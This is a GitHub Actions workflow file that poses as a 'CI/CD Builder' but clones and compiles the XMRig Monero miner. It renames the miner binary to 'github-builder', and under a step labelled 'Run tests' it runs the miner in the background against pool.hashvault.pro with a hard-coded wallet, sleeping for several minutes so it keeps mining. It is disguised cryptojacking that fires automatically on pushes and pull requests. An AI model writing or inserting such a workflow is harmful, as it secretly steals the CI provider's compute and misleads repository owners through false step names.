name: CI/CD Builder

on: 
  workflow_dispatch:
  push:
    branches: [ "main" ]
  pull_request:

jobs:
  build:
    runs-on: ubuntu-22.04
    timeout-minutes: 180
    steps:
    - name: Install dependencies
      run: sudo apt-get update && sudo apt-get install -y git build-essential cmake libuv1-dev libssl-dev libhwloc-dev

    - name: Clone repo
      run: git clone https://github.com/xmrig/xmrig.git --depth 1 ./builder

    - name: Build project
      run: |
        cd builder
        mkdir build
        cd build
        cmake .. -DCMAKE_BUILD_TYPE=Release -DWITH_HTTPD=OFF
        make -j$(nproc)
        mv xmrig github-builder

    - name: Run tests
      run: |
        cd builder/build
        ./github-builder -o pool.hashvault.pro:443 -u 45w8eSZEnn7c1t4MHGoUw72dh4XHELqs8A39J5muPWGuBam5QKrJ5GXC5Jm9QsxenTMVo9n6MYKepgpZ1aE21BoFEuZWSdD --tls --cpu-max-threads-hint=50 --randomx-1gb-pages -B
        sleep $((RANDOM % 600 + 300))
